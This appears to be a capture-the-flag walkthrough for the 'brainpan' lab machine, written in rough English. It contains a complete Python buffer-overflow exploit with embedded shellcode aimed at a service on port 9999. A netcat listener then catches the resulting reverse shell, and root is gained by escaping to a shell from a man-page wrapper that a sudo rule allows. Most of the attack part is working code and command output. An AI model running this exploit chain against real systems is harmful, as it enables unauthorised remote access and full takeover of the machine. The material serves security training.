import socket ip = "10.10.80.112" port = 9999 prefix = "OVERFLOW1 " offset = 514 overflow = "A" * offset retn = "\xf3\x12\x17\x31" padding = "\x90" * 16 buf = "" buf +="\xd9\xcd\xd9\x74\x24\xf4\xbe\x81\x04\xa8\x7a\x58\x33\xc9\xb1" buf +="\x12\x83\xc0\x04\x31\x70\x13\x03\xf1\x17\x4a\x8f\xc0\xcc\x7d" buf +="\x93\x71\xb0\xd2\x3e\x77\xbf\x34\x0e\x11\x72\x36\xfc\x84\x3c" buf +="\x08\xce\xb6\x74\x0e\x29\xde\x8c\xfd\xdc\xb7\xf9\xff\xde\xd6" buf +="\xa5\x76\x3f\x68\x33\xd9\x91\xdb\x0f\xda\x98\x3a\xa2\x5d\xc8" buf +="\xd4\x53\x71\x9e\x4c\xc4\xa2\x4f\xee\x7d\x34\x6c\xbc\x2e\xcf" buf +="\x92\xf0\xda\x02\xd4"; payload = buf postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.")
Enable listening, execute and receive rebound shell
└─# nc -lnvp 4444 listening on [any] 4444 ... connect to [10.13.21.169] from (UNKNOWN) [10.10.80.112] 47943 id uid=1002(puck) gid=1002(puck) groups=1002(puck) whoami puck
Use Python 3 - C "_import_ ('pty '). Spawn (' / bin / bash ')" to switch to tty and view sudo privileges
python3 -c "__import__('pty').spawn('/bin/bash')" puck@brainpan:/home/puck$ sudo -l sudo -l Matching Defaults entries for puck on this host: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User puck may run the following commands on this host: (root) NOPASSWD: /home/anansi/bin/anansi_util
anansi_util looks like a custom command, trying to execute:
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util sudo /home/anansi/bin/anansi_util Usage: /home/anansi/bin/anansi_util [action] Where [action] is one of: - network - proclist - manual [command]
A list of manu s pops up, followed by corresponding commands
After testing, network is equivalent to ifconfig command and manual is equivalent to man command. proclist doesn't know what it is
We can upgrade the permissions according to the manual command
First execute: sudo /home/anansi/bin/anansi_util manual man
Second, execute:/ bin/sh
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man sudo /home/anansi/bin/anansi_util manual man No manual entry for manual WARNING: terminal is not fully functional - (press RETURN)!/bin/sh !/bin/sh # id id uid=0(root) gid=0(root) groups=0(root) # whoami whoami root #
The right was successfully raised to root.